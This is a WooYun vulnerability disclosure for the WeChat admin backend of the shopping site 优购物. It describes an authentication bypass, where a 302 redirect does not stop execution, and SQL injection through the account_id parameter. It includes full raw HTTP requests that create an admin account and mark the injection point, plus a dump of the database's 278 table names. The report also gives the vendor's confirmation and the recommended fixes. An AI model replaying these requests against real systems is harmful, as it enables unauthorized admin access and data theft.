当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113875

漏洞标题:优购物某后台未授权访问和MySQL注射

相关厂商:北京优购文化发展有限公司

漏洞作者: 路人甲

提交时间:2015-05-13 12:46

修复时间:2015-06-27 14:36

公开时间:2015-06-27 14:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-13: 细节已通知厂商并且等待厂商处理中
2015-05-13: 厂商已经确认,细节仅向厂商公开
2015-05-23: 细节向核心白帽子及相关领域专家公开
2015-06-02: 细节向普通白帽子公开
2015-06-12: 细节向实习白帽子公开
2015-06-27: 细节向公众公开

简要描述:

优购物某后台未授权访问和MySQL注射

详细说明:

漏洞1,302绕过
302跳转未exit,扔输出了页面内容,可以直接访问后台,把返回的302改成200即可。

17ugo.1.png


示例添加个wooyun,密码wooyun的账号,顺利进入后台:

POST http://weixin.17ugo.com/index.php/system/account_saveaccount.php HTTP/1.1
Host: weixin.17ugo.com
Proxy-Connection: keep-alive
Content-Length: 129
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://weixin.17ugo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://weixin.17ugo.com/index.php/system/account_newaccount.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: tanchu=1; __ozlvd1687=1431490775; _ga=GA1.2.176173063.1431489248; Hm_lvt_7b74f5f61e55127b3a8e6c0f8a2eed17=1431489248; Hm_lpvt_7b74f5f61e55127b3a8e6c0f8a2eed17=1431490776; NTKF_T2D_CLIENTID=guestA0E8E9FA-3ADA-86A7-38B7-4B68833B15F2; nTalk_CACHE_DATA={uid:kf_9715_ISME9754_guestA0E8E9FA-3ADA-86,tid:1431489248352962,onlyone:1}; __utma=232567135.176173063.1431489248.1431489249.1431489249.1; __utmb=232567135.2.10.1431489249; __utmc=232567135; __utmz=232567135.1431489249.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); nTalk_PAGE_MANAGE={|m|:[],|t|:|12:25:21|}; ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2262ec6d7076c52987ddf0fd109027df21%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.1.1.22%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A109%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F42.0.2311.135+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1431491396%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22authcode%22%3Bs%3A4%3A%225981%22%3B%7D464c98229bae00440f0a77172e4e82e2
account_id=&account_name=wooyun&account_role=1&account_new_passwd_1=wooyun&account_new_passwd_2=wooyun&account_description=wooyun


17ugo.2.png


注射点多个,参数均为account_id:

POST /index.php/system/account_saveaccount.php HTTP/1.1
Content-Length: 447
Content-Type: application/x-www-form-urlencoded
Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%227a321192c2030a4d159f93fe87de5c56%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.1.1.22%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28iPhone%3B+CPU
+iPhone+OS+8_0+like+Mac+OS+X%29+AppleWebKit%2F600.1.3+%28KHTML%2C+like+Gecko%29+Version%2F8.0+Mobile%2F12A4345%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1431453432%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22authcode%22%3Bs
%3A4%3A%225276%22%3B%7D75360e9880cbd02fb9d5db92f4114d41
Host: weixin.17ugo.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
Accept: */*
account_description=111111&account_id=*&account_name=test&account_new_passwd_1=test&account_new_passwd_2=test&account_role=-

漏洞证明:

current user:    'wechat@127.0.0.1'
Database: wx2
[278 tables]
+------------------------------------+
| app_coupon_desc |
| wx_account |
| wx_account_assigned_message |
| wx_account_reply_message |
| wx_account_reply_message_00 |
| wx_account_reply_message_01 |
| wx_account_reply_message_02 |
| wx_account_reply_message_03 |
| wx_account_reply_message_04 |
| wx_account_reply_message_05 |
| wx_account_reply_message_06 |
| wx_account_reply_message_07 |
| wx_account_reply_message_08 |
| wx_account_reply_message_09 |
| wx_account_reply_message_10 |
| wx_account_reply_message_11 |
| wx_account_reply_message_12 |
| wx_account_reply_message_13 |
| wx_account_reply_message_14 |
| wx_account_reply_message_15 |
| wx_account_reply_message_16 |
| wx_account_reply_message_17 |
| wx_account_reply_message_18 |
| wx_account_reply_message_19 |
| wx_account_reply_message_20 |
| wx_account_reply_message_21 |
| wx_account_reply_message_22 |
| wx_account_reply_message_23 |
| wx_account_reply_message_24 |
| wx_account_reply_message_25 |
| wx_account_reply_message_26 |
| wx_account_reply_message_27 |
| wx_account_reply_message_28 |
| wx_account_reply_message_29 |
| wx_account_reply_message_30 |
| wx_account_reply_message_31 |
| wx_account_reply_message_32 |
| wx_account_reply_message_33 |
| wx_account_reply_message_34 |
| wx_account_reply_message_35 |
| wx_account_reply_message_36 |
| wx_account_reply_message_37 |
| wx_account_reply_message_38 |
| wx_account_reply_message_39 |
| wx_account_reply_message_40 |
| wx_account_reply_message_41 |
| wx_account_reply_message_42 |
| wx_account_reply_message_43 |
| wx_account_reply_message_44 |
| wx_account_reply_message_45 |
| wx_account_reply_message_46 |
| wx_account_reply_message_47 |
| wx_account_reply_message_48 |
| wx_account_reply_message_49 |
| wx_account_reply_message_50 |
| wx_account_reply_message_51 |
| wx_account_reply_message_52 |
| wx_account_reply_message_53 |
| wx_account_reply_message_54 |
| wx_account_reply_message_55 |
| wx_account_reply_message_56 |
| wx_account_reply_message_57 |
| wx_account_reply_message_58 |
| wx_account_reply_message_59 |
| wx_account_reply_message_60 |
| wx_account_reply_message_61 |
| wx_account_reply_message_62 |
| wx_account_reply_message_63 |
| wx_account_reply_message_64 |
| wx_account_reply_message_65 |
| wx_account_reply_message_66 |
| wx_account_reply_message_67 |
| wx_account_reply_message_68 |
| wx_account_reply_message_69 |
| wx_account_reply_message_70 |
| wx_account_reply_message_71 |
| wx_account_reply_message_72 |
| wx_account_reply_message_73 |
| wx_account_reply_message_74 |
| wx_account_reply_message_75 |
| wx_account_reply_message_76 |
| wx_account_reply_message_77 |
| wx_account_reply_message_78 |
| wx_account_reply_message_79 |
| wx_account_reply_message_80 |
| wx_account_reply_message_81 |
| wx_account_reply_message_82 |
| wx_account_reply_message_83 |
| wx_account_reply_message_84 |
| wx_account_reply_message_85 |
| wx_account_reply_message_86 |
| wx_account_reply_message_87 |
| wx_account_reply_message_88 |
| wx_account_reply_message_89 |
| wx_account_reply_message_90 |
| wx_account_reply_message_91 |
| wx_account_reply_message_92 |
| wx_account_reply_message_93 |
| wx_account_reply_message_94 |
| wx_account_reply_message_95 |
| wx_account_reply_message_96 |
| wx_account_reply_message_97 |
| wx_account_reply_message_98 |
| wx_account_reply_message_99 |
| wx_add_auto_reply_message |
| wx_app_download |
| wx_assemble_auto_reply_message |
| wx_auto_reply_message |
| wx_banner |
| wx_brand_day |
| wx_column |
| wx_column_list |
| wx_dialog_message |
| wx_dialog_user |
| wx_district |
| wx_examine |
| wx_goods |
| wx_group |
| wx_group_message |
| wx_important_user |
| wx_jfgz |
| wx_keyword |
| wx_keyword_auto_reply_message |
| wx_keyword_reply_rule |
| wx_materials |
| wx_menu |
| wx_menu_message |
| wx_menu_publish_time |
| wx_message |
| wx_message_00 |
| wx_message_01 |
| wx_message_02 |
| wx_message_03 |
| wx_message_04 |
| wx_message_05 |
| wx_message_06 |
| wx_message_07 |
| wx_message_08 |
| wx_message_09 |
| wx_message_10 |
| wx_message_11 |
| wx_message_12 |
| wx_message_13 |
| wx_message_14 |
| wx_message_15 |
| wx_message_16 |
| wx_message_17 |
| wx_message_18 |
| wx_message_19 |
| wx_message_20 |
| wx_message_21 |
| wx_message_22 |
| wx_message_23 |
| wx_message_24 |
| wx_message_25 |
| wx_message_26 |
| wx_message_27 |
| wx_message_28 |
| wx_message_29 |
| wx_message_30 |
| wx_message_31 |
| wx_message_32 |
| wx_message_33 |
| wx_message_34 |
| wx_message_35 |
| wx_message_36 |
| wx_message_37 |
| wx_message_38 |
| wx_message_39 |
| wx_message_40 |
| wx_message_41 |
| wx_message_42 |
| wx_message_43 |
| wx_message_44 |
| wx_message_45 |
| wx_message_46 |
| wx_message_47 |
| wx_message_48 |
| wx_message_49 |
| wx_message_50 |
| wx_message_51 |
| wx_message_52 |
| wx_message_53 |
| wx_message_54 |
| wx_message_55 |
| wx_message_56 |
| wx_message_57 |
| wx_message_58 |
| wx_message_59 |
| wx_message_60 |
| wx_message_61 |
| wx_message_62 |
| wx_message_63 |
| wx_message_64 |
| wx_message_65 |
| wx_message_66 |
| wx_message_67 |
| wx_message_68 |
| wx_message_69 |
| wx_message_70 |
| wx_message_71 |
| wx_message_72 |
| wx_message_73 |
| wx_message_74 |
| wx_message_75 |
| wx_message_76 |
| wx_message_77 |
| wx_message_78 |
| wx_message_79 |
| wx_message_80 |
| wx_message_81 |
| wx_message_82 |
| wx_message_83 |
| wx_message_84 |
| wx_message_85 |
| wx_message_86 |
| wx_message_87 |
| wx_message_88 |
| wx_message_89 |
| wx_message_90 |
| wx_message_91 |
| wx_message_92 |
| wx_message_93 |
| wx_message_94 |
| wx_message_95 |
| wx_message_96 |
| wx_message_97 |
| wx_message_98 |
| wx_message_99 |
| wx_message_contrast |
| wx_message_count |
| wx_message_id |
| wx_message_tag |
| wx_message_tag_relation |
| wx_message_time |
| wx_message_total_statistics |
| wx_message_type |
| wx_mixed_materials |
| wx_node |
| wx_node_copy |
| wx_node_copy_bak |
| wx_notice |
| wx_notice_rule |
| wx_notice_time_copy |
| wx_online_customer |
| wx_openid_accountid |
| wx_operation_log |
| wx_operation_type |
| wx_role |
| wx_sale_time |
| wx_send_moon |
| wx_send_msgid |
| wx_statistics_important_user |
| wx_statistics_keyword_reply_msg |
| wx_statistics_new_subscirbe_msg |
| wx_statistics_new_subscribe_user |
| wx_statistics_notkeyword_reply_msg |
| wx_statistics_total_account |
| wx_statistics_total_msg |
| wx_statistics_total_user |
| wx_statistics_unsubscribe_user |
| wx_subscribe_reply_message |
| wx_tag |
| wx_today_half |
| wx_today_live |
| wx_tvdialog_message |
| wx_tvdialog_user |
| wx_unmatch_user_reply_message |
| wx_user |
| wx_user_bind |
| wx_user_contrast |
| wx_user_tag |
| wx_user_total_statistics |
| wx_week_broad |
| wx_weekbroad |
| wx_welcomemsg |
| wx_wxaccount |
| wx_zxkf |
+------------------------------------+

修复方案:

输出302后exit
参数过滤,解决SQL注射

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-05-13 14:35

厂商回复:

感谢您的关注,漏洞正在修复。

最新状态:

暂无


漏洞评价:

评论